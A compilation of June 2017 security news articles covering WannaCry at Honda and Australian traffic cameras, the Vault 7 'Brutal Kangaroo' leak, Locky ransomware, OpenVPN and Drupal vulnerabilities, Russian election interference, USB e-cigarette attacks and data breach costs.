Honda Motor Company released a statement this week, saying the company was forced to halt its production for more than 24 hours at in one of its Japan-based factories after finding the WannaCry infections in its computer networks.
The automaker halted production of more than 1,000 at its Sayama plant, northwest of Tokyo, on Monday 19th June after it discovered that the ransomware had affected networks across Japan, North America, Europe, China, and other regions despite its efforts to secure systems in mid-May, according to a Wednesday report from Reuters.
While Honda did not say how WannaCry got into their networks 37 days after a researcher activated the kill switch, it's clear that the computers inside the Honda network were running unsupported versions of Windows OS or it did not install a highly critical patch released by Microsoft in March.
The Honda's Sayama plant, which produces the Accord sedan, Odyssey Minivan, Step Wagon compact multipurpose vehicle and more, produces around 1,000 vehicles per day.
Renault and Nissan were also infected by the WannaCry ransomware last month, which also forced them to temporarily stop their production at plants in Britain, India, Japan, France, and Romania.
WannaCry Hits 55 Traffic-Light and Speed Cameras in Australia
Another recent WannaCry victim was spotted in Australia when the Victoria Police confirmed that the ransomware infected a total of 55 red light cameras and speed cameras in Victoria via private camera operator Redflex.
The malware locked down critical files and demanded a ransom in return (WannaCry usually demands $300 to unlock files), according to the 3AW morning radio show.
"A system patch has been applied, which prevents the spread of the virus," the officials told the show. "The Department is in the process of removing the [WannaCry] virus from the affected cameras. The remaining websites will be rectified in the next couple of days."
The authorities believed the infection was the result of a targeted cyber attack, rather than 'human error,' likely on the part of a camera technician, and that WannaCry got onboard via a USB drive.
"Our advice at this stage is that a software virus has been detected however the camera system has not been compromised," the police said. "We will look into all incidents detected by the speed and red light cameras during the time in question as a matter of course. The integrity of the camera system has not been affected."
Well, it is quite surprising that even after knowing about the WannaCry issue for quite a decent amount of time, big companies have not yet implemented proper security measures to defend against the threat.
Ransomware has become an albatross around everyone's neck. Recently, a South Korean web hosting provider confirmed that the company had paid a record $1 Million ransom to hackers in return of its data following a ransomware attack over the weekend.
In cyberspace, Ignorance is not bliss. So, go and apply the goddamn patches and disable the unsecured, 30-year-old SMBv1 file-sharing protocol on your systems.


Brutal Kangaroo: CIA-developed Malware for Hacking Air-Gapped Networks Covertly
22.6.2017 thehackernews BigBrothers

WikiLeaks has published a new batch of the ongoing Vault 7 leak, this time detailing a tool suite – which is being used by the CIA for Microsoft Windows that targets "closed networks by air gap jumping using thumb drives," mainly implemented in enterprises and critical infrastructures.
Air-gapped computers that are isolated from the Internet or other external networks are believed to be the most secure computers on the planet have become a regular target in recent years.
Dubbed Brutal Kangaroo (v1.2.1), the tool suit was allegedly designed by the Central Intelligence Agency (CIA) in year 2012 to infiltrate a closed network or air-gapped computer within an organization or enterprise without requiring any direct access.
The previous version of Brutal Kangaroo was named as EZCheese, which was exploiting a vulnerability that was zero-day until March 2015, though the newer version was using "unknown link file vulnerability (Lachesis/RiverJack) related to the library-ms functionality of the operating system."
Here's How the Air-Gap Attack Works

Like most air-gapped malware techniques we reported on The Hacker News, this hacking tool first infects an Internet-connected computer within the target organization and then installs the Brutal Kangaroo malware on it.

Even if it's hard to reach an Internet-connected PC within the target organisation, they can infect a computer of one of the organisation's employees and then wait for the employee to insert the USB drive into his/her computer.
Now, as soon as a user (the employee of the organisation) inserts a USB stick into the infected computer, Shattered Assurance, a server tool infects the USB drive with a separate malware, called Drifting Deadline (also known as 'Emotional Simian' in the latest version).

The USB drive infects with the help of a flaw in the Microsoft Windows operating system that can be exploited by hand-crafted link files (.lnk) to load and execute programs (DLLs) without user interaction.
"The .lnk file(s) must be viewed in windows explorer, and the tool will be auto-executed without any further input." the manual says.
When the infected USB drive is used to share data with air-gapped computers, the malware spreads itself to those systems as well.
"If multiple computers on the closed network are under CIA control, they form a covert network to coordinate tasks and data exchange. Although not explicitly stated in the documents, this method of compromising closed networks is very similar to how Stuxnet worked," WikiLeaks said.
"Brutal Kangaroo components create a custom covert network within the target closed network and providing functionality for executing surveys, directory listings, and arbitrary executables," a leaked CIA manual reads.

The malware then starts collecting data from infected air-gapped computers (which utilizes Shadow, the primary persistence mechanism) covertly and a module within the Brutal Kangaroo suit, dubbed "Broken Promise," analyzes the data for juiceful information.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks dumped an alleged CIA framework used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Dubbed "Cherry Blossom," the framework was basically a remotely controllable firmware-based implant for wireless networking devices, including routers and wireless access points (APs), which exploits router vulnerabilities to gain unauthorized access and then replace the firmware with custom Cherry Blossom firmware.
Since March, the whistleblowing group has published 12 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
Pandemic – a CIA's project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
Athena – a spyware framework that has been designed to take full control over Windows PCs remotely, and works against every version of Microsoft's Windows operating systems, from Windows XP to Windows 10.
AfterMidnight and Assassin – Two apparent CIA malware frameworks for the Windows platform that has been designed to monitor and report back activities of the infected remote host computer and execute malicious actions.
Archimedes – Man-in-the-Middle attack tool allegedly created by the CIA to target computers inside a Local Area Network (LAN).
Scribbles – Software reportedly designed to embed 'web beacons' into confidential files and documents, allowing the agency to track whistleblowers and insiders.
Grasshopper – A framework which allowed the agency to easily create custom malware for breaking into Windows operating system and bypassing antivirus protection.
Marble – The source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the spying agency to hide the actual source of its malware.
Dark Matter – Revealed hacking exploits the CIA designed to target iPhones and Macs.
Weeping Angel – A spying tool used by the CIA to infiltrate smart TV's and then transform them into covert microphones.
Year Zero – Disclosed several CIA hacking exploits for popular hardware and software.


Necurs Botnet Distributing Locky Ransomware via Fake Invoices

22.6.2017 securityweek  Ransomware
The Necurs spam botnet has switched back to distributing the Locky ransomware in a campaign featuring messages disguised as fake invoices, Cisco Talos security researchers reveal.

Last year, Necurs was the main driver behind Locky’s ascension to the top of the ransomware charts, and their activity was tightly connected. Following several months of vacation in early 2017, Necurs resumed activity in April, but distributed Locky only for a few weeks.

Starting around May 12, the same day WannaCy made its first appearance, Necurs switched to distributing a new ransomware family called Jaff. The malware was found to be tightly connected to Locky, as the same actor operated both ransomware families.

Earlier this month, however, Kaspersky Lab security researchers discovered vulnerabilities in Jaff and managed to create a decryptor for it, allowing victims to recover their data for free. Although three Jaff variants were observed to date, the decryption tool would work for all three of them.

The decryptor’s release apparently took Jaff out of the race, and Necurs returned to pushing Locky once again. The spam emails pushing the ransomware feature a double-zipped archive with an .exe file inside. Unlike previous Necurs-driven campaigns, which used themes such as order confirmations, payment receipts, and business documents, the new messages are fake invoices.

The newly observed campaign, Talos reports, features a notable volume of spam: during the first hour, it accounted for around 7% of the email volume registered by one of the company’s systems. The volume has decreased, but the campaign continues to be active, the security researchers say.

The campaign uses the same affiliate ID as before, but the ransomware itself appears to have suffered a series of changes, one of which prevents it from encrypting data on systems running under operating systems more recent than Windows XP.

The command and control (C&C) URL structure is another notable aspect of this campaign, the security researchers say: “Adversaries behind this latest Locky campaign have reused the /checkupdate path as part of the URL structure -- the same URL structure found in previous Locky campaigns. This is perhaps another indication that adversaries were hasty in their developing and distributing this campaign.”

Talos suggests that Locky’s operators are likely aware of the existing issues with the ransomware, and that an updated variant of the malware is likely to emerge soon, addressing the bug. At the moment, however, the Locky sample distributed via Necurs can encrypt only Windows XP systems.

“It's always risky clicking on links or opening attachments in strange email messages. Users that fail to heed this advice can easily become ransomware victims, and if the subsequent ransom is paid, the monies will no doubt fund another round of attacks. As always, organizations are encouraged to make regular backups of their data, practice restoring said data, and store backups offline far out of the reach of potential criminals,” Talos said.


Consortium Promotes Principles for Fair and Accurate Security Ratings

22.6.2017 securityweek IT
Under the aegis of the U.S. Chamber of Commerce, more than 40 companies -- including some of America's largest banks and tech companies -- have signed up to a set of new guiding principles for fair and accurate security ratings.

Security rating has become an emerging technology over the last few years, with companies such as BitSight (which raised $40 million in Series C financing, September 2016), RiskRecon, and SecurityScorecard all offering to rate the security of companies and products. It's a valuable service, helping organizations better understand the security of their supply chain, and helping cybersecurity insurance companies understand the risk inherent in potential customers.

But there are difficulties. In a statement Tuesday, Ann Beauchesne, an SVP at the Chamber of Commerce, explained, "There is, of course, the potential for the rating to be inaccurate, irrelevant, incomplete, or unverifiable. Problematic source data can create unfair and unreliable ratings, which serves neither the consumers of security ratings nor the organizations whose programs are rated."

One of the problems is the 'black box' nature of the scores. The rating companies collect data -- sometimes with and sometimes without the knowledge of the target company -- from a wide range of sources. This data is fed into a proprietary algorithm and, simplistically, out pops a score. The value of a complex security program reduced to a single score is not always apparent or verifiable.

To solve this problem she continued, "a group of U.S. Chamber member companies have worked closely with security rating companies to develop a concrete set of principles (PDF) to increase confidence in, and usability of, fair and accurate security ratings."

The principles comprise transparency; dispute resolution; accuracy and validation; methodology model governance; independence; and confidentiality -- and the attempt is to bring consistency and credibility to an emerging market.

"The fact that so many large organizations are coming together on this issue shows that the Security Rating Services market is here, real, important, and essential for the future of B2B risk management," BitSight's SVP Jake Olcott told SecurityWeek.

While insurance providers can use ratings in their premium calculations, by far the bigger market comes from general commerce. Most large companies now have thousands of new cloud services as part of their supply chain, and CISOs struggle to get an accurate view of the risk they bring. This unquantifiable risk will only grow,

By 2020, claims Olcott, security ratings will be as important as credit ratings. "Just as credit ratings are part of every B2B transaction," he said, "so too will security ratings become a critical element. [There are] many reasons for this, including the ever-expanding business ecosystem, the explosion of third party breaches, the challenge of finding cyber security and risk talent, and the difficulty in assessing cyber risk of the ecosystem at scale (quickly and cost-effectively)."

For that to happen, there must be trust in the accuracy and consistency of the rating process and the rating scores -- both between scores from the same rating company, and between scores generated by different companies. Backed by major cross-sector companies such as Goldman Sachs and JPMorgan, Microsoft and Verizon, and Starbucks and Eli Lilly, the Chamber of Commerce principles will go a long way towards providing that trust.


Honda Halts Production at Japan Plant After Cyber Attacks

22.6.2017 securityweek Cyber
Honda said Wednesday it had temporarily halted production at a plant in Japan after it suffered a cyberattack from the same ransomware that struck hundreds of thousands of computers worldwide last month.

The Japanese automaker said it had shut its plant in Sayama, near Tokyo, on Monday after discovering its computer system was infected with the so-called WannaCry virus.

The virus encrypts computer files, making them inaccessible until users pay a ransom.

"The malware affected the production of about 1,000 cars," a Honda spokeswoman told AFP, adding that production restarted on Tuesday.

"There is a possibility that our overseas facilities were also infected... We're now investigating that," she added.

Honda's plant produces a number of models including the Accord sedan and Odyssey Minivan.

The unprecedented global cyberattacks, which started in mid May, struck banks, hospitals and government agencies in more than 150 countries, exploiting known vulnerabilities in old Microsoft computer operating systems.

In May, French auto giant Renault was hit, forcing it to halt production at sites in France, Slovenia and Romania as part of measures to stop the spread of the virus.

Nissan's British unit in Sunderland was also hit in the attack.

In Japan, 2,000 computers at 600 companies and organisations had been affected by the May virus, according to media reports.

Japanese conglomerate Hitachi was also affected, saying its computer networks were "unstable", crippling its email systems.

Authorities across the world have issued public alerts warning computer users to beware of suspicious emails and beef up their computer security measures.


Social Media 'Bots' From Russia Distorting Global Politics: Study

22.6.2017 securityweek Social
A wave of "computational propaganda," largely driven by Russia, is impacting politics around the world by spreading misinformation designed to manipulate public opinion, researchers said Tuesday.

The Oxford University team presented research in Washington on the use of automated programs or "bots" on social media aimed at influencing politics in nine countries, including the United States.

"Computational propaganda is one of the most powerful new tools against democracy," said the research paper directed by Oxford's Philip Howard and Samuel Woolley.

The research is not the first to note the existence of Twitter bots and other automated tools aimed at disrupting politics but offers insight into the global scale of efforts, which are traced mainly to Russia but also operate in China and in the target countries themselves.

"We know that there is a building with hundreds of employees in St. Petersburg with a budget of millions of dollars dedicated to manipulating public opinion" in a number of countries, Howard said at a media presentation.

Howard said the Russian style of propaganda involves "seeding multiple, conflicting and contradictory stories."

Woolley said the goal of this effort "is to confuse, it's not necessarily to sell a fake story. It's to make people so apathetic about politics and policy in general that they don't really want to engage anymore."

The research team analyzed tens of millions posts on seven different social media platforms during elections, political crises, and national security incidents between 2015 and 2017 in Brazil, Canada, China, Germany, Poland, Taiwan, Russia, Ukraine, and the United States.

- Social media battles -

While propaganda and fake news are longstanding tools in politics, the use of automation and algorithms to create bots on social media appears to have accelerated the spread of misinformation.

Platforms like Facebook and Twitter have taken steps to curb the spread of fake news stories while also arguing it is not their role to edit or control content.

The researchers said Twitter is more vulnerable to bots because it allows users to set up anonymous accounts and its programming platform is open.

In the United States, the researchers said they concluded that bots had "measurable influence" during the 2016 election by affecting the flow of information.

"Social media bots manufacture consensus by artificially amplifying traffic around a political candidate or issue," the researchers wrote.

"Armies of bots built to follow, retweet, or like a candidate's content make that candidate seem more legitimate, more widely supported, than they actually are... the illusion of online support for a candidate can spur actual support through a bandwagon effect."

In Russia, the researchers said they found 45 percent of the political conversation is dominated by "highly automated accounts."

While Twitter was an effective tool for pro-democracy activists during the Arab Spring movements starting in 2010, the researchers say authoritarian governments now use these platforms to suppress social activism.

Perhaps the most flagrant examples of computational propaganda are in Ukraine, they said, describing it as "the frontline of numerous disinformation campaigns in Europe."

They said fake stories such as one about "a crucified boy" or another about Ukrainian soldiers being paid with "two slaves and a piece of land" have turned into "textbook examples of how propaganda works."


Critical RCE Flaw Found in OpenVPN that Escaped Two Recent Security Audits
22.6.2017 thehackernews
Vulnerebility
A security researcher has found four vulnerabilities, including a critical remote code execution bug, in OpenVPN, those were not even caught in the two big security audits of the open source VPN software this year.
OpenVPN is one of the most popular and widely used open source VPN software solutions mostly used for various connectivity needs, but it is especially popular for anonymous and private access to the Internet.
This year, two independent security audits of OpenVPN were carried out to look for flaws, backdoors, and other defects in the open source software – one conducted by a team led by Johns Hopkins University crypto-boffin Dr. Matthew D. Green.
The audits resulted in a patch of a few vulnerabilities in the widely used open source software, giving OpenVPN a clean chit.
Researcher Used Fuzzer to find Bugs in OpenVPN
Researcher Guido Vranken of Netherlands exclusively used a fuzzer and recently discovered four security holes in OpenVPN that escaped both the security audits.
Three of the four flaws the researcher discovered are server-side, two of which cause servers to crash, while the remaining is a client-side bug that could allow an attacker to steal a password to gain access to the proxy.
The most critical vulnerability of all is CVE-2017-7521, which affects OpenVPN server-side and resides in extract_x509_extension() function which deals with SSL certificates.
The vulnerability could allow a remote authenticated attacker to craft and send a certificate that either crashes the OpenVPN service or triggers a double free that potentially lead to remote code execution within the server.
Vranken was not able to demonstrate the RCE bug but argued that the remote code execution could be achieved in theory. In a report published Wednesday, he had explained how one could achieve a remote memory leak because of the service's failure to check a particular return value.
"If you look in the OpenSSL source code, one way through which ASN1_STRING_to_UTF8 can fail is if it cannot allocate sufficient memory," Vranken said in his report. "So the fact that an attacker can trigger a double-free IF the server has insufficient memory, combined with the fact that the attacker can arbitrarily drain the server of memory, makes it plausible that a remote double-free can be achieved."
"But if a double-free is inadequate to achieve remote code execution, there are probably other functions, whose behavior is wildly different under memory duress, that you can exploit."
The second vulnerability, CVE-2017-7520, resides in the way OpenVPN connects to a Windows NTLM version 2 proxy.
A man-in-the-middle attacker between the OpenVPN client and the proxy server can either remotely crash the client or steal the user's password to the proxy from a memory leak.
The vulnerability could be triggered only under certain circumstances, like when the client connects to a proxy through NTLM version 2 authentication, or when the client specifies a username ending with a backslash.
"If clients use a HTTP proxy with NTLM authentication (--http-proxy [|'auto'|'auto-nct'] ntlm2), a man-in-the-middle [MITM] attacker between the client and the proxy can cause the client to crash or disclose at most 96 bytes of stack memory," the OpenVPN team explains.
"The disclosed stack memory is likely to contain the proxy password. If the proxy password is not reused, this is unlikely to compromise the security of the OpenVPN tunnel itself. Clients who do not use the --http-proxy option with ntlm2 authentication are not affected."
Other two vulnerabilities (CVE-2017-7508 and CVE-2017-7522) are remote server crashes which could trigger by sending maliciously-crafted IPv6 packets or malicious data post-authentication.
Patches for Servers and Clients Already Available
Vranken responsibly disclosed all the vulnerabilities he discovered to the OpenVPN team in May and June and the team has already patched the issues in its latest version of the VPN software.
While there is no proof of any of the vulnerabilities had been publicly exploited, users are strongly advised to update their installations to OpenVPN versions 2.4.3 or 2.3.17 as soon as possible in order to be on the safer side.
For more in-depth technical details of all the vulnerabilities, you can head on to the report titled, "The OpenVPN Post-Audit Bug Bonanza," published by Vranken on Wednesday.


Drupal Patches Flaw Exploited in Spam Campaigns

22.6.2017 securityweek  Exploit  Spam
Drupal security updates released on Wednesday address several vulnerabilities, including one that has been exploited in spam campaigns.

The flaw exploited in the wild, patched with the release of Drupal versions 7.56 and 8.3.4, is a moderately critical access bypass vulnerability tracked as CVE-2017-6922.

The problem is that files uploaded by anonymous users to a private file system can be accessed by all anonymous users, not just the user who uploaded them, as it should be. The security hole only affects websites that allow anonymous users to upload files to a private file system.

Drupal has known about attacks exploiting this flaw since October 2016. At the time, it warned that misconfigured websites had been abused by malicious actors to host files and point users and search engines to them. The latest updates for Drupal 7 and 8 introduce a protection that should prevent exploitation.

“For example, if a webform configured to allow anonymous visitors to upload an image into the public file system, that image would then be accessible by anyone on the internet. The site could be used by an attacker to host images and other files that the legitimate site maintainers would not want made publicly available through their site,” the Drupal Security Team said in its October 2016 advisory.

Drupal 8.3.4 also patches a critical issue related to how the PECL YAML parser handles unsafe objects. An attacker can exploit the flaw, tracked as CVE-2017-6920, for remote code execution.

Another vulnerability fixed in Drupal 8 is a less critical improper field validation bug (CVE-2017-6921).

“A site is only affected by this if the site has the RESTful Web Services (rest) module enabled, the file REST resource is enabled and allows PATCH requests, and an attacker can get or register a user account on the site with permissions to upload files and to modify the file resource,” Drupal said in its advisory.

The Drupal Security Team warned users in mid-April that a serious vulnerability affected a third-party module named References, which had been used by more than 121,000 websites. The module had no longer been supported and Drupal initially advised users to migrate to a different product. However, a new maintainer took over the project shortly after and the flaw was addressed.


Russia Targeted Election-Related Networks in 21 States: DHS

22.6.2017 securityweek BigBrothers
Hackers believed to be working for the Russian government targeted election-related networks in 21 U.S. states, representatives of the Department of Homeland Security (DHS) told the Senate Intelligence Committee on Wednesday in a hearing on threats to election infrastructure.

DHS officials revealed that the agency’s Office of Intelligence and Analysis (I&A) published a report in October claiming that cyber actors possibly connected to the Russian government had targeted websites and other election-related systems in 21 states. The states have not been named, but some news organizations previously reported that the list includes Arizona and Illinois.

The DHS said only a “small number” of networks were compromised, but it did not find any evidence that vote tallies had been altered. In many cases, only attempts to scan election infrastructure were detected.

The DHS has admitted that cyberattack attribution is difficult, but the agency appears confident that the Russian government was involved in these operations.

A few months before last year’s presidential election, the DHS said there was no indication that cyber threat actors had been planning to attack election infrastructure in a way that would change the outcome of the vote, and noted that the checks and redundancies in the system made the task difficult. However, the agency warned at the time that “cyber operations targeting election infrastructure could be intended or used to undermine public confidence in electoral processes and potentially the outcome.”

In his statement before the Senate Intelligence Committee, Bill Priestap, Assistant Director of the FBI’s Counterintelligence Division, said “Russia’s 2016 presidential election influence effort was its boldest to date in the United States.”

“Moscow employed a multi-faceted approach intended to undermine confidence in our democratic process. Russia’s activities included efforts to discredit Secretary Clinton and to publicly contrast her unfavorably with President Trump,” Priestap stated. “This Russian effort included the weaponization of stolen cyber information, the use of Russia’s English-language state media as a strategic messaging platform, and the mobilization of social media bots and trolls to spread disinformation and amplify Russian messaging.”

The FBI is still investigating the extent of Russia’s interference, including whether or not any of President Donald Trump’s current or former associates aided Moscow’s efforts.

The United States has officially accused Russia of attempting to interfere with the November election, but the Kremlin has denied the allegations. Russian President Vladimir Putin recently admitted that patriotic hackers may have launched attacks, but denied government involvement and said hacking is unlikely to have a real impact on elections in a country.

Top secret documents leaked recently from the National Security Agency (NSA) also show that hackers affiliated with the Russian military had repeatedly attempted to break into U.S. voting systems before the election.


Honda halted production in a factory after finding WannaCry traces in its networks
22.6.2017 securityaffairs
Ransomware

The Honda company shuts down a factory in Japan after finding the WannaCry ransomware in its networks after 5 weeks its massive attack.
The WannaCry ransomware makes the headlines once again, The Honda Company to stopped the production in one of its plant in Japan after discovering the malware in its computer networks,

The Honda automaker halted the activities in the Sayama plant northwest of Tokyo on Monday after finding that the WannaCry ransomware had infected systems in its networks across Japan, North America, Europe, China, and other regions,

According to the Reuters agency, the experts discovered the infection on Sunday.

“The automaker shut production on Monday at its Sayama plant, northwest of Tokyo, which produces models including the Accord sedan, Odyssey Minivan and Step Wagon compact multipurpose vehicle and has a daily output of around 1,000 vehicles.” states the article.

“Honda discovered on Sunday that the virus had affected networks across Japan, North America, Europe, China and other regions, a spokeswoman said, despite efforts to secure its systems in mid-May when the virus caused widespread disruption at plants, hospitals and shops worldwide.”

According to the company, the production at other plants had not been affected, according to a Honda Spokesman, regular operations at the Sayama plant had resumed on Tuesday.

It is still unclear why the WannaCry ransomware was present in the Honda networks 5 weeks after its discovery,

WannaCrypt ransomware

the unique certainly is that the company had yet to patch its systems with the highly critical patch that Microsoft released in March.

One possibility is that IT staff at the company has inadvertently blocked the access to the kill switch domain that partially stopped the infections. That would have caused the WannaCry propagation inside the Honda networks.

We cannot exclude that the shutdown of Sayama plant was a precautionary measure to eradicate dormant instance of the ransomware.

Honda wasn’t the only company forced to shut down its networks due to WannaCry, other automakers like Renault and Nissan Motor were affected and were forced to halt productions in plants in Japan, Britain, France, Romania, and India.

It’s my opinion that the failure in responding the WannaCry attack was primarily caused by the failure of patch management processes. Don’t forget that systems across the world were infected by ransomware that was exploiting a flaw that was already fixed by a two-month-old patch.


Attackers can exploit electronic cigarettes to hack computers
22.6.2017 securityaffairs
Exploit

Hackers can exploit electronic cigarettes and any other electronic device to deliver a malware in a poorly protected network.
In November 2014, in a discussion started on the Reddit news media website it has been debated the case of a malware implanted by using electronic cigarettes connected over USB.

Hackers are able to exploit any electronic device to deliver a malware in a poorly protected network. Electronic cigarettes could be an attack vector, the idea may appear hilarious, many electronic cigarettes can be charged over USB, using a special cable or by inserting one end of the cigarette directly into a USB port.

The report posted on the social news Reddit website reported a strange case happened to an executive that discovered a malware in his system without immediately identify its source.

“One particular executive had a malware infection on his computer from which the source could not be determined,” reported a Reddit user “After all traditional means of infection were covered, IT started looking into other possibilities.

Investigating on the case, the man discovered that the electronic cigarettes were infected by a malware hardcoded into the charger, once the victim will connect it to the computer the malicious code will contact the C&C server to drop other malicious code and infect the system

Electronic cigarettes or vape pens properly modified could be an effective hacking tool to infect a targeted computer.

The security researcher Ross Bevington presented at BSides London how to use electronic cigarettes to compromise a computer by tricking it to believe that it was a keyboard.The researchers also explained that it is BSides London how to use electronic cigarettes to compromise a computer by tricking it to believe that it was a keyboard.

It is important to note that Bevington’s attack required the victim’s machine to be unlocked.

“PoisonTap is a very similar style of attack that will even work on locked machines,” Mr Bevington told Sky News.

The researchers also explained that it is possible to use the electronic cigarettes to interfere with its network traffic.

E-cigarettes are powered by a rechargeable lithium-ion battery that can be plugged into a cable or directly connects to the USB port of a computer.

“Security researchers have demonstrated how e-cigarettes can easily be modified into tools to hack computers.” reported SkyNews.

“With only minor modifications, the vape pen can be used by attackers to compromise the computers they are connected to – even if it seems just like they are charging.”
The researcher @FourOctets published a proof-of-concept video which showed arbitrary commands being sent to an unlocked laptop just by charging a vape pen.

Wll buy derby ticket @FourOctets
Sorry if I get vape pens banned at your work place......
5:29 PM - 25 May 2017
801 801 Retweets 1,076 1,076 likes
Twitter Ads info and privacy
Fouroctets modified the vape pen by simply adding a hardware chip which allowed the device to communicate with the laptop as if it were a keyboard or mouse.

“A pre-written script that was saved on the vape made Windows open up the Notepad application and typed “Do you even vape bro!!!!“” reported SkyNews.


Mozilla Brings Privacy-Focused Browser to Android

21.6.2017 securityweek Android
After making it available for iOS devices in November 2016, Mozilla this week brought its privacy-focused mobile browser to Android.

Called Firefox Focus, the application is designed to address the various threats to user privacy that loom on the web, while also providing users with a fast, free, and easy-to-use browsing experience.

On iOS, the browser currently enjoys a 4.6 average rating on the App Store, making it “the highest rated browser from a trusted brand for the iPhone and iPad,” Mozilla says.

The main feature of the browser is to block ad, analytics, social, and various other trackers, without requiring users to change their settings. Because of that, it can provide users with increased control on how their online activities are tracked on their devices, regardless of whether they surf the Internet from a smartphone or tablet.

The Android version packs the very same features, and is “free of tabs and other visual clutter,” Mozilla’s Barbara Bermes reveals. The same as the iOS counterpart, the application allows users to browse the web without being followed by tracking ads, thus also offering a faster experience.

Additionally, the browser features an easily accessible “Erase” button that allows users to clear the browsing session data with a single tap. All of the privacy enhancements in Firefox Focus, Mozilla says, are available without requiring users to modify their settings.

“Browse like no one’s watching. The new Firefox Focus automatically blocks a wide range of online trackers — from the moment you launch it to the second you leave it. Easily erase your history, passwords and cookies, so you won’t get followed by things like unwanted ads,” Mozilla notes in the browser’s description in Google Play.

According to Bermes, Firefox Focus for Android comes with some additional features, such as an ad tracker counter (to see how many ads are blocked per site), the option to disable tracker blocker (for sites that are not loading correctly), and a notification reminder (it reminds users they can easily tap to erase the browsing history while the browser runs in the background).

“For Android users we also made Focus a great default browser experience. Since we support both custom tabs and the ability to disable the ad blocking as needed, it works great with apps like Facebook when you just want to read an article without being tracked,” Bermes continues.

The browser, she notes, was meant to empower users on the mobile web, and is expected to receive new features that will improve the experience it provides.

Chrome is currently the uncontested leader in the browser market, but Mozilla’s privacy-focused application could impact its dominance, Chris Olson, CEO of The Media Trust, told SecurityWeek in an emailed statement.

“It will be interesting to see how this latest Firefox browser will impact Chrome's dominance of the browser market. In attempts to differentiate itself with default ad blocking, Firefox is potentially alienating partners in the hopes of driving user adoption. It remains to be seen how many users disable the ad block feature as many of the world's most heavily-trafficked websites won't load properly on mobile devices when an ad blocker is active,” Olson said.

Firefox Focus for Android is available via Google Play, while the iOS version can be downloaded through the App Store.


Average Cost of Data Breach Drops Globally, Rises to $7.35 Million in U.S.

21.6.2017 securityweek Incindent
Cost of Data Breach Drops Globally, But Rises 5% in U.S.

The 2017 IBM Security and Ponemon Institute annual report on the cost of a breach shows that the cost of stolen records and the total cost of a breach continues to rise -- at least in America. The lost- or stolen-record cost rose from $221 to $225 each, while the average total cost of a breach increased from $7.01 million to $7.35 million for organizations in the United States.

In the European countries included in the study -- France, Germany Italy and the United Kingdom -- these costs actually fell. For example, in the UK, the average per capita cost of a data breach decreased from £102 to £98 and the average total organizational cost decreased from £2.53 million in 2016 to £2.48 million in 2017.

The annual Cost of Data Breach Study (PDF) is one of security's yearly benchmark reports. This year, Ponemon Institute, sponsored by IBM, analyzed the cost-effect of data breaches for more than 400 companies in 13 countries. However, it should be noted that not everyone believes it is possible to accurately define and compare different breaches in different companies over time. In recent years both Verizon and ENISA have said it is too difficult.

SecurityWeek asked Diana Kelley, global executive security advisor to IBM Security, whether such criticisms are fair. "It's hard to do these comparisons," she admitted, "but Ponemon goes to great pains over many months using a consistent methodology to ensure they are valid." While the breached companies change, the methodology for data gathering remains consistent, and the bottom line, she added, is that "IBM is confident in their validity, and we are seeing a picture of what can save us money when we have a breach; and also things that result in that cost being higher than perhaps it needs to be."

In America, the key factors in reducing the cost of a breach are incident response, encryption and education. Having an incident response team in place resulted in a $19 reduction in cost per lost or stolen record, followed by extensive use of encryption ($16 reduction per record) and employee training ($12.50 reduction per record). None of this is rocket science, suggested Keeley; "but sometimes it takes science-backed data figures to make us realize just how important they are."

Notable factors increasing the cost of a breach include the involvement of third-parties in a data breach (increasing the cost $17 per record), compliance failures and s 'rush to notify'. The first of these is a well-understood threat vector. "Organizations need to evaluate the security posture of their third-party providers – from payroll to cloud providers to CRM – to ensure the security of employee and customer data," says IBM.

The latter two, however, are worth considering in relation to the difference in breach costs between America and Europe together with the different compliance regulations of the two areas. "In Europe," suggested Keeley, "we've had the EU Data Protection Directive for many years, and now we have the upcoming GDPR. This area has been dealing with very strict data privacy laws for a very long time. We suspect that this is the primary reason for the difference -- because of this ongoing need to be more mature with data protection, it has led to a more efficient and optimized series of response programs in Europe."

IBM does not claim that this is a proven conclusion, but just one worth considering. If it is true, however, it leads to further useful speculation. At one level, it supports the EU's insistence on strict and rigid rules. But it also confirms that security really can work -- breaches may not be preventable, but effective incident response will certainly make them less costly.

There could be other causes, of course. Do Europeans simply spend more on security than their American counterparts, or do they use it more efficiently? This is difficult to answer. The two regions are broadly similar, although the US is considered to be the richer (according to the Federalist Debate, GDP is around 40% higher in the US than in the EU).

Certainly, according to IDC's 2016 Worldwide Revenue for Security Technology Forecast, "the United States will be the largest market for security products throughout the forecast. In 2016, the U.S. is forecast to see $31.5 billion in security-related investments. Western Europe will be the second largest market with revenues of nearly $19.5 billion this year."

It would appear from this that European companies do not spend more on security than America companies -- which leads us back to the idea that strict data privacy laws can spur companies to more efficient data protection. The upcoming GDPR, of course, will affect US companies in ways they were not affected by the existing European laws.

If the hypothesis that conforming to strict compliance requirements can improve security and reduce breach costs, then over the next few years the cost of a breach in the US might start to decrease in line with Europe. "It's going to be interesting," Keeley told SecurityWeek. "Looking at the processes, procedures and technology within GDPR, there's a lot in there that can really help a company mature their overall data program. We can't predict the future -- but we shall see."

There is, of course, a huge amount of data within the Cost of Breach Study. Usually, it takes readers a considerable amount of time to isolate and analyze the particular information of interest. Here we have looked at just one area: the effect of compliance on the cost of a breach. This year, however, the study is accompanied by an online tool that will help companies delve deeper into different areas of the study: such as the effect of customer churn following a breach, the effect of employing a CISO on costs, and so on.

"This interactive tool," IBM told SecurityWeek, "allows you to explore the data from the report on your own, uncover trends and learn more about the cost of a data breach directly related to specific industries and/or security measures."


Three years ago ProtonMail was launched. Today, it is launching ProtonVPN
21.6.2017 securityaffairs Safety

ProtonMail announced ProtonVPN is now available to the general public. ProtonVPN is officially out of beta.
You can now directly get ProtonVPN by visiting https://protonvpn.com

After more than 1 year of development, and four months of beta testing by over 10’000 members of the ProtonMail community, we’re finally making ProtonVPN available to everyone. And we really mean everyone, because consistent with our mission to make privacy and security accessible to every single person in the world, we’re also releasing ProtonVPN as a free VPN service.

It has been a long and exciting journey to get here since our team first met at CERN in 2013. Back then, we had an ambitious vision to build an Internet that was free and could continue to reach its full potential as a tool for social progress. Indeed, that was the vision that inspired Tim Berners-Lee to create the World Wide Web at CERN in 1989.

